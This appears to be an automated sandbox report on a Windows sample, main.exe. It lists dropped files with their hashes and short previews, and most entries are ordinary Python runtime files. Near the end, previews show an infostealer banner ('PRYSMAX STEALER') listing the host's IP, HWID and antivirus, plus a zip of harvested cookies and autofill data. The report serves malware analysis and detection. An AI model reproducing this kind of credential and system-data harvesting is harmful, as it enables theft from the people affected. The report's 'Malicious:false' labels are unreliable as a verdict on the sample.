                                                                                                                                                                                                                                                                              SSDEEP:768:Iw/EsYpkVgBaz57kcDA7QKFmpz7cnzH/ks/KF61xubwmB1Cf//yhC74JFmpktJS0:v/5k8cnzeJWJIYL0D7Sy7x9
                                                                                                                                                                                                                                                                              MD5:7E07C63636A01DF77CD31CFCA9A5C745
                                                                                                                                                                                                                                                                              SHA1:593765BC1729FDCA66DD45BBB6EA9FCD882F42A6
                                                                                                                                                                                                                                                                              SHA-256:DB84BC052CFB121FE4DB36242BA5F1D2C031B600EF5D8D752CF25B7C02B6BAC6
                                                                                                                                                                                                                                                                              SHA-512:8C538625BE972481C495C7271398993CFE188E2F0A71D38FB51EB18B62467205FE3944DEF156D0FF09A145670AF375D2FC974C6B18313FA275CE6B420DECC729
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):5800216
                                                                                                                                                                                                                                                                              Entropy (8bit):6.092588839205304
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:49152:4kkzsT7AzjUaeLdj6UTSGKzuePQaOviRvYD4Kus0GYr3jDKPpWjrM06biCnCIS7E:wsgreBltVe1EsJ5CrSQHyMAwdp09U
                                                                                                                                                                                                                                                                              MD5:387BB2C1E40BDE1517F06B46313766BE
                                                                                                                                                                                                                                                                              SHA1:601F83EF61C7699652DEC17EDD5A45D6C20786C4
                                                                                                                                                                                                                                                                              SHA-256:0817A2A657A24C0D5FBB60DF56960F42FC66B3039D522EC952DAB83E2D869364
                                                                                                                                                                                                                                                                              SHA-512:521CDE6EAA5D4A2E0EF6BBFDEA50B00750AE022C1C7BD66B20654C035552B49C9D2FAC18EF503BBD136A7A307BDEB97F759D45C25228A0BF0C37739B6E897BAD
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):670208
                                                                                                                                                                                                                                                                              Entropy (8bit):6.035999626973864
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12288:ngSkceIv3zBJBQoXNi4LCQqAOffa1tpd5g:gSkc/v3zB9NiEWfa
                                                                                                                                                                                                                                                                              MD5:31C1BF2ACA5DF417F6CE2618C3EEFE7E
                                                                                                                                                                                                                                                                              SHA1:4C2F7FE265FF28396D03BA0CAB022BBD1785DBF2
                                                                                                                                                                                                                                                                              SHA-256:1DAF7C87B48554F1481BA4431102D0429704832E42E3563501B1FFDD3362FCD1
                                                                                                                                                                                                                                                                              SHA-512:5723145F718CC659ADD658BA545C5D810E7032842907BAB5C2335E3DE7F20FE69B58AA42512FD67EA8C6AA133E59E0C26BD90700BDD0D0171AF6C1E1C73A2719
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):134656
                                                                                                                                                                                                                                                                              Entropy (8bit):5.999117329459055
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3072:kLcVKY3tOSjPenBttgY/r06Yr27vJmxETaTX7wevxJ:kLcVKY3tOWPxY/rkqzJmxEmTXMev
                                                                                                                                                                                                                                                                              MD5:5D67ABF69A8939D13BEFB7DE9889B253
                                                                                                                                                                                                                                                                              SHA1:BCBBF88C05732D4E1E3811FD312425C1C92018D1
                                                                                                                                                                                                                                                                              SHA-256:615EB8A75F9ED9371A59DA8F31E27EE091C013DB0B9164A5124CA0656EA47CB4
                                                                                                                                                                                                                                                                              SHA-512:FA34EB05996C41F23524A8B4F1FAED0BDD41224D8E514AA57D568A55D2044C32798C1357F22C72AD79FD02948CAAD89B98B8E9B0AD2927E4A0169739335271CE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):30488
                                                                                                                                                                                                                                                                              Entropy (8bit):6.578083215899035
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:oG0ICxeeLn0XHqYK/57AvB0KJIYQGFHQIYiSy1pCQuRWAM+o/8E9VF0NyMl+:tieOGHqlGxJIYQGp5YiSyvHAMxkEN
                                                                                                                                                                                                                                                                              MD5:E4AB524F78A4CF31099B43B35D2FAEC3
                                                                                                                                                                                                                                                                              SHA1:A9702669EF49B3A043CA5550383826D075167291
                                                                                                                                                                                                                                                                              SHA-256:BAE0974390945520EB99AB32486C6A964691F8F4A028AC408D98FA8FB0DB7D90
                                                                                                                                                                                                                                                                              SHA-512:5FCCFB3523C87AD5AB2CDE4B9C104649C613388BC35B6561517AE573D3324F9191DD53C0F118B9808BA2907440CBC92AECFC77D0512EF81534E970118294CDEE
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1050
                                                                                                                                                                                                                                                                              Entropy (8bit):5.072538194763298
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:24:1rmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:1aJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                                                                              MD5:7A7126E068206290F3FE9F8D6C713EA6
                                                                                                                                                                                                                                                                              SHA1:8E6689D37F82D5617B7F7F7232C94024D41066D1
                                                                                                                                                                                                                                                                              SHA-256:DB3F0246B1F9278F15845B99FEC478B8B506EB76487993722F8C6E254285FAF8
                                                                                                                                                                                                                                                                              SHA-512:C9F0870BC5D5EFF8769D9919E6D8DDE1B773543634F7D03503A9E8F191BD4ACC00A97E0399E173785D1B65318BAC79F41D3974AE6855E5C432AC5DACF8D13E8A
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Copyright Jason R. Coombs..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTW
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):6301
                                                                                                                                                                                                                                                                              Entropy (8bit):5.107162422517841
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:192:W4rkAIG0wRg8wbNDdq6T9927uoU/GBpHFwTZ:Sq0wRg8wbNDdBh927uoU/GBRFi
                                                                                                                                                                                                                                                                              MD5:9E59BD13BB75B38EB7962BF64AC30D6F
                                                                                                                                                                                                                                                                              SHA1:70F6A68B42695D1BFA55ACB63D8D3351352B2AAC
                                                                                                                                                                                                                                                                              SHA-256:80C7A3B78EA0DFF1F57855EE795E7D33842A0827AA1EF4EE17EC97172A80C892
                                                                                                                                                                                                                                                                              SHA-512:67AC61739692ECC249EBDC8F5E1089F68874DCD65365DB1C389FDD0CECE381591A30B99A2774B8CAAA00E104F3E35FF3745AFF6F5F0781289368398008537AE7
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: setuptools.Version: 65.5.0.Summary: Easily download, build, install, upgrade, and uninstall Python packages.Home-page: https://github.com/pypa/setuptools.Author: Python Packaging Authority.Author-email: distutils-sig@python.org.Project-URL: Documentation, https://setuptools.pypa.io/.Project-URL: Changelog, https://setuptools.pypa.io/en/stable/history.html.Keywords: CPAN PyPI distutils eggs package management.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: Topic :: System :: Systems Administration.Classifier: Topic :: Utilities.Requires-Python: >=3.7.License-File: LICENSE.Provides-Extra: certs.Provides-Extra: docs.Requi
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):37694
                                                                                                                                                                                                                                                                              Entropy (8bit):5.555787611309118
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:384:vSzcBlShgRUhbul9nXJkpIVh498WjXYH0+5+E/8mrnaDoaQP7IOQRJqxBPgof2yd:vc853yQXYAY8AKCT9r2/GsIVxE9Im
                                                                                                                                                                                                                                                                              MD5:087F72A04BB085627494651E36C4C513
                                                                                                                                                                                                                                                                              SHA1:1E39070E246F91D8926268A033C6F584E629E2DE
                                                                                                                                                                                                                                                                              SHA-256:BFB77A968E06417BD37023BF1A2D7F1AAE9D8E74231665D6699D5BB82BDBD7B0
                                                                                                                                                                                                                                                                              SHA-512:39CE042A20324C6B63A192D70E56B36318C45D04B810A6BD333D1D40B6DAAD947AFB9156C003BC86C700A59F0F25753416D754DA06C808814920F92582CB6058
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:_distutils_hack/__init__.py,sha256=TSekhUW1fdE3rjU3b88ybSBkJxCEpIeWBob4cEuU3ko,6128.._distutils_hack/__pycache__/__init__.cpython-311.pyc,,.._distutils_hack/__pycache__/override.cpython-311.pyc,,.._distutils_hack/override.py,sha256=Eu_s-NF6VIZ4Cqd0tbbA5wtWky2IZPNd8et6GLt1mzo,44..distutils-precedence.pth,sha256=JjjOniUA5XKl4N5_rtZmHrVp0baW_LoHsN0iPaX10iQ,151..pkg_resources/__init__.py,sha256=fT5Y3P1tcSX8sJomClUU10WHeFmvqyNZM4UZHzdpAvg,108568..pkg_resources/__pycache__/__init__.cpython-311.pyc,,..pkg_resources/_vendor/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..pkg_resources/_vendor/__pycache__/__init__.cpython-311.pyc,,..pkg_resources/_vendor/__pycache__/appdirs.cpython-311.pyc,,..pkg_resources/_vendor/__pycache__/zipp.cpython-311.pyc,,..pkg_resources/_vendor/appdirs.py,sha256=MievUEuv3l_mQISH5SF0shDk_BNhHHzYiAPrT3ITN4I,24701..pkg_resources/_vendor/importlib_resources/__init__.py,sha256=evPm12kLgYqTm-pbzm60bOuumumT8IpBNWFp0uMyrzE,506..pkg_resources/_vendor/importli
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                                                                              Entropy (8bit):4.820827594031884
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlViZHKRRP+tPCCfA5S:RtBMwlViojWBBf
                                                                                                                                                                                                                                                                              MD5:4D57030133E279CEB6A8236264823DFD
                                                                                                                                                                                                                                                                              SHA1:0FDC3988857C560E55D6C36DCC56EE21A51C196D
                                                                                                                                                                                                                                                                              SHA-256:1B5E87E00DC87A84269CEAD8578B9E6462928E18A95F1F3373C9EEF451A5BCC0
                                                                                                                                                                                                                                                                              SHA-512:CD98F2A416AC1B13BA82AF073D0819C0EA7C095079143CAB83037D48E9A5450D410DC5CF6B6CFF3F719544EDF1C5F0C7E32E87B746F1C04FE56FAFD614B39826
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.37.1).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):2740
                                                                                                                                                                                                                                                                              Entropy (8bit):4.540737240939103
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:48:lELcZDy3g6ySDsm90rZh2Phv4hhpTqTog:yLAP8arZoP94hTTqcg
                                                                                                                                                                                                                                                                              MD5:D3262B65DB35BFFAAC248075345A266C
                                                                                                                                                                                                                                                                              SHA1:93AD6FE5A696252B9DEF334D182432CDA2237D1D
                                                                                                                                                                                                                                                                              SHA-256:DEC880BB89189B5C9B1491C9EE8A2AA57E53016EF41A2B69F5D71D1C2FBB0453
                                                                                                                                                                                                                                                                              SHA-512:1726750B22A645F5537C20ADDF23E3D3BAD851CD4BDBA0F9666F9F6B0DC848F9919D7AF8AD8847BD4F18D0F8585DDE51AFBAE6A4CAD75008C3210D17241E0291
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:[distutils.commands].alias = setuptools.command.alias:alias.bdist_egg = setuptools.command.bdist_egg:bdist_egg.bdist_rpm = setuptools.command.bdist_rpm:bdist_rpm.build = setuptools.command.build:build.build_clib = setuptools.command.build_clib:build_clib.build_ext = setuptools.command.build_ext:build_ext.build_py = setuptools.command.build_py:build_py.develop = setuptools.command.develop:develop.dist_info = setuptools.command.dist_info:dist_info.easy_install = setuptools.command.easy_install:easy_install.editable_wheel = setuptools.command.editable_wheel:editable_wheel.egg_info = setuptools.command.egg_info:egg_info.install = setuptools.command.install:install.install_egg_info = setuptools.command.install_egg_info:install_egg_info.install_lib = setuptools.command.install_lib:install_lib.install_scripts = setuptools.command.install_scripts:install_scripts.rotate = setuptools.command.rotate:rotate.saveopts = setuptools.command.saveopts:saveopts.sdist = setuptools.command.sdist:sdist.seto
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                              Entropy (8bit):3.9115956018096876
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:3Wd+Nt8AfQYv:3Wd+Nttv
                                                                                                                                                                                                                                                                              MD5:789A691C859DEA4BB010D18728BAD148
                                                                                                                                                                                                                                                                              SHA1:AEF2CBCCC6A9A8F43E4E150E7FCF1D7B03F0E249
                                                                                                                                                                                                                                                                              SHA-256:77DC8BDFDBFF5BBAA62830D21FAB13E1B1348FF2ECD4CDCFD7AD4E1A076C9B88
                                                                                                                                                                                                                                                                              SHA-512:BC2F7CAAD486EB056CB9F68E6C040D448788C3210FF028397CD9AF1277D0051746CAE58EB172F9E73EA731A65B2076C6091C10BCB54D911A7B09767AA6279EF6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:_distutils_hack.pkg_resources.setuptools.
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1540888
                                                                                                                                                                                                                                                                              Entropy (8bit):6.5843112373819705
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):1140504
                                                                                                                                                                                                                                                                              Entropy (8bit):5.437116185038964
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):14848
                                                                                                                                                                                                                                                                              Entropy (8bit):5.113812591033072
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):133120
                                                                                                                                                                                                                                                                              Entropy (8bit):5.849201651779307
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):23552
                                                                                                                                                                                                                                                                              Entropy (8bit):5.281874510289411
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):535040
                                                                                                                                                                                                                                                                              Entropy (8bit):6.1723495244729625
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):650752
                                                                                                                                                                                                                                                                              Entropy (8bit):6.4073215909095005
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:6144:rbTutDqcmbgSZZ/jZMaBHXD/OHHSAU1gIkpWCuMshv9K1HFV1jBjgG4LFxJY/1n:rfrcmsSHBHXiSArRENMivwF1jdgs/1n
                                                                                                                                                                                                                                                                              MD5:A19B5E6324D1A6A9FD99C98FE7B83FE2
                                                                                                                                                                                                                                                                              SHA1:4E3E56754A3C46C661EF591A4B5A5985BD4F6B85
                                                                                                                                                                                                                                                                              SHA-256:3ED00BB5876EAFA617BEBB213D2BC887B5637C53C4A849FCC2366084BF056787
                                                                                                                                                                                                                                                                              SHA-512:5975F90036CB7D3013FC6815F2C372EB9B89AF6C8153D1770EBBD70BF5B61E3B12DEFA3D7A4CCD364BD6A978B2879A15801D2AEC8BAD9221CA15DFFC9B7BA929
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):519680
                                                                                                                                                                                                                                                                              Entropy (8bit):6.407145343537454
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12288:n5vDYEvt0Fwyow0k1rErp645rtxvi1gRNg5sXgz0:npBvt0Fw9fk1rErQ45rt5RNZ
                                                                                                                                                                                                                                                                              MD5:56DB4A861AEC914A860461DEDCDCA0A0
                                                                                                                                                                                                                                                                              SHA1:8535A8C9EAC371A54308795A8BBE89414933E035
                                                                                                                                                                                                                                                                              SHA-256:6AB611C4A24406D9D97F09D49D50142AB2734B69A2B0D9EA6489E4AF90C4A2A4
                                                                                                                                                                                                                                                                              SHA-512:600A21666E9ED334DE5B4B17F60136434EE485C80F9740E6085E24EF95CA5376E6223A54C6B1C8F12987EDAB5D89AF9676CC12E2A335F4C4E9AB79DFEF8E4B90
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                                                                                                                              Entropy (8bit):4.713840781302666
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:S3yE25MOWrYXtHVE/DRFrgm5/gvJgXDLAUDA+ERo6+aEYqVS1f6gq1WGgVSBn:S3mSOWWHVUDjrgmxgRgzLXDA6Va8VeuR
                                                                                                                                                                                                                                                                              MD5:8C7CA775CF482C6027B4A2D3DB0F6A31
                                                                                                                                                                                                                                                                              SHA1:E3596A87DD6E81BA7CF43B0E8E80DA5BC823EA1A
                                                                                                                                                                                                                                                                              SHA-256:52C72CF96B12AE74D84F6C049775DA045FAE47C007DC834CA4DAC607B6F518EA
                                                                                                                                                                                                                                                                              SHA-512:19C7D229723249885B125121B3CC86E8C571360C1FB7F2AF92B251E6354A297B4C2B9A28E708F2394CA58C35B20987F8B65D9BD6543370F063BBD59DB4A186AC
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:# Generated file - this directory may be deleted to reset the COM cache.....import win32com..if __path__[:-1] != win32com.__gen_path__: __path__.append(win32com.__gen_path__)..
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):10
                                                                                                                                                                                                                                                                              Entropy (8bit):2.7219280948873625
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:qW6:qW6
                                                                                                                                                                                                                                                                              MD5:2C7344F3031A5107275CE84AED227411
                                                                                                                                                                                                                                                                              SHA1:68ACAD72A154CBE8B2D597655FF84FD31D57C43B
                                                                                                                                                                                                                                                                              SHA-256:83CDA9FECC9C008B22C0C8E58CBCBFA577A3EF8EE9B2F983ED4A8659596D5C11
                                                                                                                                                                                                                                                                              SHA-512:F58362C70A2017875D231831AE5868DF22D0017B00098A28AACB5753432E8C4267AA7CBF6C5680FEB2DC9B7ABADE5654C3651685167CC26AA208A9EB71528BB6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:..K....}..
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):361555
                                                                                                                                                                                                                                                                              Entropy (8bit):7.997629529208548
                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                              SSDEEP:6144:Pb8kAtOnTdaHDQG4gcUEHExrc/M5F9S8DzFqk4fQLokLyfteo4RVcCymPiCpwhhF:jtEkZajQGLcrHExAMT9Bd54620o4bcDh
                                                                                                                                                                                                                                                                              MD5:0EB9EE8F67055D844D5DE8255E897C9D
                                                                                                                                                                                                                                                                              SHA1:AE8316659A1691B924ACA27D8C7AEDEAF8F91FC7
                                                                                                                                                                                                                                                                              SHA-256:D89BCE9C80D3A81A1D51845AF5932334573E0F9B8F896F6984E3E68CF6883C0F
                                                                                                                                                                                                                                                                              SHA-512:80EE800516C9A019E4EF14448F901F200E85A87B684CD8C95F6D4621743A6EE3DFBE9321F01027F8BCCF52BED6770BEEF8E1946D9A230683C7F7CB35C49424F8
                                                                                                                                                                                                                                                                              Malicious:false
Preview: ZIP archive (binary content omitted); readable entry names: files/, information.txt, prautofill.txt, prcookies.txt
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):671
                                                                                                                                                                                                                                                                              Entropy (8bit):4.577569385682426
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:SAMbe7bzLxAcRQN3ASVc6hWcA7p4dqpfWN2ZtTwmLRE4g4/g5SBAoXSgBu:SAMa7bp+NDWp4NyAUg5SBAovu
                                                                                                                                                                                                                                                                              MD5:B498B558E2B2A151F994C1506FE32FB1
                                                                                                                                                                                                                                                                              SHA1:003B83EA325F3CB7B40971814A2AD59ED2137EAD
                                                                                                                                                                                                                                                                              SHA-256:1CEE5A9083F8AE3813C002BFD6F8F49185DACC056AD604F6E5959127A46E609D
                                                                                                                                                                                                                                                                              SHA-512:9ABBE20A43FBE35589EEEE8A3B5B4C01556FC7401978D986E2199B8CEBE3E423F79CB62D622559DCFA51BA59D2B79C336783EB7B5B408980A9BA244B8FC86A12
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:.. .. .PRYSMAX STEALER!.. .. . Network Info.. .. . IP: 8.46.123.189.. . Country: United States.. . Region: New York.. . City: New York.. . Vpn: False.. . ISP: Level 3.. ... .. . Machine Info .. .. . Pc Name: 745773.. . OS: Windows-10-10.0.19045-SP0.. . CPU: Intel64 Family 6 Model 143 Stepping 8, GenuineIntel.. . HWID: 71434D56-1548-ED3D-AEE6-C75AECD93BF0.. . RAM: 7.999267578125.. . GPU: .. . Windows Key: .. . Antiviruses: Windows Defender.. List of process: 210....
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (515), with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):3158
                                                                                                                                                                                                                                                                              Entropy (8bit):5.8972122901567925
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:96:/JMpO2gpcRqpZX22HTSjv3pB7H7e8zLs/Zw49ckse:BkXRQSfIh
                                                                                                                                                                                                                                                                              MD5:8C6FF34551E5D45A9E60A03D31487053
                                                                                                                                                                                                                                                                              SHA1:23C65812BDDBE33010D34CA421BD4D187DF95F74
                                                                                                                                                                                                                                                                              SHA-256:5D23122C1B86CC45E5EADDED5DED8AFE6751BFC2A9AD645CE59D08AEABED5BD4
                                                                                                                                                                                                                                                                              SHA-512:B568472F1AA723F2CE29A5C5BBA33A62599237B5D5DC8ACB19D2749B9E9D662A07BA0E8DDB8408EABB4A012E498C947EF16990218E8A1F6BE2777E66FC11C0F9
                                                                                                                                                                                                                                                                              Malicious:false
Preview: cookie entries for .google.com, support.microsoft.com, support.office.com, .microsoft.com (cookie values omitted)
                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):809
                                                                                                                                                                                                                                                                              Entropy (8bit):5.165968547442475
                                                                                                                                                                                                                                                                              Encrypted:false
